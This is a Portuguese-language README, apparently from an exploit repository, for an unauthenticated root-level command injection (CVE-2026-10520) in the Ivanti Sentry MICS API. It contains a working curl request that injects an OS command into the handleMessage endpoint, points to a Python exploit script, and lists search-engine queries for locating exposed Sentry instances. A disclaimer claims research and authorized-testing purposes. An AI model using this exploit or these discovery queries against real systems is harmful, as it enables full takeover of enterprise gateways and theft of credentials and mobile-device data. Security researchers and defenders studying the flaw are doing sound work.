
RCE de nível raiz via OS Command Injection no Ivanti Sentry
O Ivanti Sentry (anteriormente MobileIron Sentry) é um gateway de segurança empresarial que faz proxy de tráfego entre dispositivos móveis e recursos corporativos de backend: e-mail, SharePoint e aplicações web internas. Ele aplica políticas de Gerenciamento de Dispositivos Móveis (MDM), encerra sessões móveis criptografadas e emite autenticação baseada em certificados para implantações de aplicativos empresariais. As instâncias do Sentry geralmente estão expostas à internet na porta 8443, expondo a API de administração do MICS (Mobile Iron Configuration Service).
CVE-2026-10520 é uma vulnerabilidade de injeção de comandos do SO não
autenticada que afeta o Ivanti Sentry antes das versões R10.5.2, R10.6.2 e
R10.7.1 (CVSSv3.1: 10 Crítico, listada no CISA KEV). A falha está no
endpoint da API MICS /mics/api/v2/sentry/mics-config/handleMessage, que
aceita comandos do sistema encapsulados em XML através de um corpo
codificado por URL, sem qualquer autenticação ou validação de entrada.
Um atacante que alcance um endpoint vulnerável pode executar comandos
arbitrários do SO como , obtendo controle total do host — incluindo
tráfego empresarial descriptografado, credenciais armazenadas e todos os dados
de dispositivos móveis gerenciados.
message# Inject 'id' command via MICS handleMessage endpoint (no authentication required)
curl -sk -X POST "http://example.com:8443/mics/api/v2/sentry/mics-config/handleMessage" \
-H "User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)" \
-H "Content-Type: application/x-www-form-urlencoded" \
-H "Connection: close" \
--data-urlencode "message=execute system /configuration/system/commandexec <commandexec><index>1</index><reqandres>id</reqandres></commandexec>"
python CVE-2026-10520-X7.py
title:"Ivanti System Manager: Sign In"body="sentry" && body="System Manager" && port="8443", title="Ivanti System Manager: Sign In", icon_hash=="1407597555"http.html:"Ivanti Standalone Sentry System Manager" port:8443 , http.title:Ivanti port:8443, http.html:"Ivanti" http.html:"Sentry" port:8443Este repositório e seu conteúdo são fornecidos estritamente para pesquisa de segurança legítima, testes de penetração autorizados, estudo educacional e fins defensivos. Ao acessar ou usar este material, você reconhece total responsabilidade por garantir que suas atividades estejam em conformidade com todas as leis aplicáveis e que obteve a devida autorização antes de testar ou aplicar essas técnicas em qualquer sistema que não possua.
Os autores e mantenedores deste projeto não assumem nenhuma responsabilidade por quaisquer danos, consequências legais ou uso indevido resultantes da aplicação destas informações. Qualquer uso para acesso não autorizado, atividade maliciosa ou fins ilegais é expressamente proibido e não suportado.
Use com responsabilidade. Mantenha-se legal. Teste apenas o que você possui ou tem permissão explícita por escrito para testar.
SCT-PL